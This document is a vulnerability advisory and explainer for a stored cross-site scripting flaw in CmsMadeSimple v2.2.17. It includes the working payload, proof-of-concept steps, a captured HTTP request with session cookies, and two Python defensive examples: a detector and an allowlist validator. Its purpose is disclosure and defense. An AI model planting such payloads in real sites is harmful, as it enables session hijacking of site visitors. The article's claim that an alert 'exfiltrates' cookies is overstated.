CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to Content Manager
3. Add New Content
4. Enter '<img src=x onerror=alert(document.cookie)>' in the metadata section
payload: <img src=x onerror=alert(document.cookie)>
5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)
Request:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1

CMSMadeSimple v2.2.17: Stored Cross-Site Scripting Vulnerability Exploited
Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in CMSMadeSimple v2.2.17, a widely used open-source content management system (CMS). This flaw enables attackers to inject malicious scripts into the application's metadata field, which are then persistently stored and executed whenever users view the affected content. The vulnerability, discovered on July 12, 2023, by Mirabbas Ağalarov, underscores the importance of input sanitization and secure handling of user-generated content in web applications.
Technical Overview of the Vulnerability
The flaw resides in the Content Manager module of CMSMadeSimple, specifically within the metadata field used during content creation. When administrators or users submit content, the system fails to properly sanitize or escape user input before storing it in the database. This allows arbitrary HTML and JavaScript payloads to be saved and later rendered in the browser without proper validation.
As demonstrated in the exploit, an attacker can inject the following payload:
<img src=x onerror=alert(document.cookie)>
This simple yet dangerous snippet exploits the onerror attribute of an <img> tag. Since the image source x is invalid, the browser triggers the onerror event, executing the embedded JavaScript code. The script attempts to alert the user’s cookie data, which may include sensitive authentication tokens or session identifiers.
Exploitation Steps (Proof of Concept)
- Login to the CMSMadeSimple administrative interface using valid credentials.
- Navigate to Content Manager under the Admin section.
- Select Add New Content to create a new page.
- Enter the malicious payload into the metadata field: <img src=x onerror=alert(document.cookie)>
- Submit the content with all required fields filled.
- Once published, visit the page via its public URL (e.g., http://localhost/index.php?page=test).
Upon loading the page, the browser executes the script, displaying a pop-up alert containing the document.cookie value — effectively exfiltrating session data from the victim’s browser.
Request and Response Analysis
Below is a representative HTTP POST request sent during content submission:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1

This request includes the metadata parameter with the XSS payload encoded as %3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E — a URL-encoded version of the malicious HTML. The server processes this input without filtering, storing it directly in the database.
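The following added example (not part of the advisory or of CMSMadeSimple's code) shows how a reviewer or WAF rule would decode the captured form body and pick out the field carrying markup. It decodes the body the way PHP's $_POST does (so `+` becomes a space and a repeated key such as showinmenu keeps its last value), then flags any parameter whose decoded value contains a tag, an `on*=` event-handler attribute or a `javascript:` URL. The body constant is a constructed, abbreviated copy of the request above, and the indicator patterns and the `HTML_EXPECTED_FIELDS` set are illustrative assumptions, not anything the application defines.

```python
import re
from urllib.parse import parse_qs

# Constructed, abbreviated copy of the form body from the captured request above
# (several fields dropped for brevity; metadata carries the advisory's payload, URL-encoded).
CAPTURED_BODY = (
    "mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6"
    "&m1_content_id=0&m1_content_type=content&title=test"
    "&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1"
    "&showinmenu=0&showinmenu=1"
    "&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E"
    "&pagedata=&design_id=2&template_id=10&m1_ajax=1&m1_apply=1"
)

# Fields where markup is expected by design (assumption): tags there are informational only.
HTML_EXPECTED_FIELDS = {"content_en"}

# Illustrative indicator set checked against each decoded value.
MARKUP_INDICATORS = [
    (re.compile(r"<\s*/?\s*[a-z][a-z0-9-]*", re.I), "html tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "event handler attribute"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URL"),
]


def decode_form_body(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body the way PHP's $_POST sees it:
    '+' becomes a space, %XX sequences are decoded, and a repeated key keeps its LAST
    value (the form sends showinmenu=0&showinmenu=1, so the application receives '1')."""
    return {key: values[-1] for key, values in parse_qs(body, keep_blank_values=True).items()}


def find_markup_fields(fields: dict[str, str]) -> dict[str, list[str]]:
    """Return {field: [indicator labels]} for every field whose decoded value looks like markup."""
    flagged = {}
    for name, value in fields.items():
        reasons = [label for pattern, label in MARKUP_INDICATORS if pattern.search(value)]
        if reasons:
            flagged[name] = reasons
    return flagged


def unexpected_markup_fields(fields: dict[str, str]) -> dict[str, list[str]]:
    """The review-worthy subset: markup in a field that should never carry it."""
    return {name: why for name, why in find_markup_fields(fields).items()
            if name not in HTML_EXPECTED_FIELDS}


if __name__ == "__main__":
    fields = decode_form_body(CAPTURED_BODY)
    print("metadata =", fields["metadata"])
    print("flagged  =", unexpected_markup_fields(fields))
```

Run over the captured body, only the metadata field is reported as unexpected markup (with both the tag and the event-handler indicators), while content_en, which legitimately holds `<p>test</p>`, is excluded by the allowlist of fields expected to contain HTML.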
Impact and Risk Assessment
| Aspect | Assessment |
|---|---|
| Risk Level | High |
| Attack Vector | Stored XSS via Content Manager metadata field |
| Exploitation Difficulty | Low (requires admin access) |
| Impact | Session hijacking, data theft, browser-based malware delivery |
| Affected Users | Any user visiting the malicious content page |
While the exploit requires administrative access to inject the payload, once stored, it can affect any authenticated or unauthenticated user who visits the page. This makes the vulnerability particularly dangerous in environments where multiple users access shared content.
Security Best Practices & Mitigation
To prevent such vulnerabilities, developers must implement robust input validation and output encoding. Key recommendations include:
- Sanitize user input using libraries like HTML Purifier or built-in PHP functions such as htmlspecialchars() when rendering content.
- Validate metadata fields to reject any HTML or JavaScript tags.
- Use Content Security Policy (CSP) headers to restrict script execution from untrusted sources.
- Implement proper role-based access control to limit who can modify content metadata.
- Log and monitor suspicious content submissions for anomalies.
For CMSMadeSimple users, upgrading to a patched version is critical. The vendor, cmsmadesimple.org, should release an updated version with input sanitization fixes to address this issue.
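As an added example of the validate-on-save plus encode-on-render approach recommended above (written for this page, not code from CMSMadeSimple or HTML Purifier), the block below implements a strict allowlist for a page-head metadata field. It goes slightly beyond the page's "reject any HTML" advice on the assumption that such a field legitimately carries `<meta>` and `<link>` tags: those two elements with a fixed attribute set pass, and every other tag, any `on*` attribute, and any `javascript:` URL is reported as a violation. At render time, a value that fails the check is HTML-escaped with html.escape, the Python equivalent of PHP's htmlspecialchars() with ENT_QUOTES, so a payload already in the database displays as text instead of executing. The allowlist contents are illustrative assumptions.

```python
import html
from html.parser import HTMLParser

# Allowlist for a page-head metadata field (assumption: the field is meant to hold
# <meta>/<link> tags for <head>). Anything outside this set is a violation.
ALLOWED_TAGS = {
    "meta": {"name", "content", "property", "charset", "http-equiv"},
    "link": {"rel", "href", "type", "media", "sizes"},
}
URL_ATTRIBUTES = {"href", "content"}  # attribute values that may be URLs (og:url etc.)


class MetadataValidator(HTMLParser):
    """Collects one error string per allowlist violation; no errors means the field is acceptable."""

    def __init__(self):
        super().__init__()
        self.errors = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <IMG ONERROR=...> is caught too
        if tag not in ALLOWED_TAGS:
            self.errors.append(f"disallowed tag <{tag}>")
            return
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                self.errors.append(f"disallowed attribute {name!r} on <{tag}>")
            elif name in URL_ATTRIBUTES and (value or "").strip().lower().startswith("javascript:"):
                self.errors.append(f"javascript: URL in {name!r} on <{tag}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <meta ... /> is checked like <meta ...>

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            self.errors.append(f"disallowed end tag </{tag}>")

    def handle_data(self, data):
        if data.strip():  # whitespace between tags is fine, loose text is not
            self.errors.append("text outside of tags")

    def handle_comment(self, data):
        self.errors.append("comment not allowed")

    def handle_decl(self, decl):
        self.errors.append("declaration not allowed")

    def handle_pi(self, data):
        self.errors.append("processing instruction not allowed")


def validate_metadata(raw: str) -> list[str]:
    """Save-time check: return the list of violations (an empty list means accept)."""
    validator = MetadataValidator()
    validator.feed(raw)
    validator.close()
    return validator.errors


def render_head_metadata(raw: str) -> str:
    """Render-time defence in depth: emit the field verbatim only if it still passes the
    allowlist; otherwise HTML-escape it (equivalent of PHP htmlspecialchars with ENT_QUOTES)
    so a stored payload is displayed as text rather than executed."""
    if validate_metadata(raw):
        return html.escape(raw, quote=True)
    return raw


if __name__ == "__main__":
    payload = "<img src=x onerror=alert(document.cookie)>"  # payload from the advisory
    print(validate_metadata(payload))
    print(render_head_metadata(payload))
    print(validate_metadata('<meta name="description" content="A test page">'))
```

Rejecting at save time is what stops the payload from ever reaching the database; the escape-on-render fallback matters for content stored before the fix, which is exactly the situation an upgrade leaves behind.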
Real-World Implications
Stored XSS vulnerabilities like this one are frequently exploited in real-world attacks. In 2022, a similar flaw in a popular CMS led to the compromise of thousands of websites through malicious content injection. Attackers used such vulnerabilities to deliver phishing scripts, steal session cookies, or redirect users to malicious domains.
When stored XSS is combined with other vulnerabilities — such as SQL injection or authentication bypass — the attack surface expands significantly. Even with moderate access, attackers can establish persistent footholds within a system.
Conclusion
CMSMadeSimple v2.2.17’s stored XSS vulnerability serves as a stark reminder that even seemingly innocuous fields like metadata can become attack vectors if not properly secured. As developers and administrators, we must adopt a defense-in-depth approach: validating input at every stage, encoding output, and enforcing strict security policies.
By understanding and mitigating such flaws, we not only protect our systems but also safeguard the trust of users who rely on our platforms for information and interaction.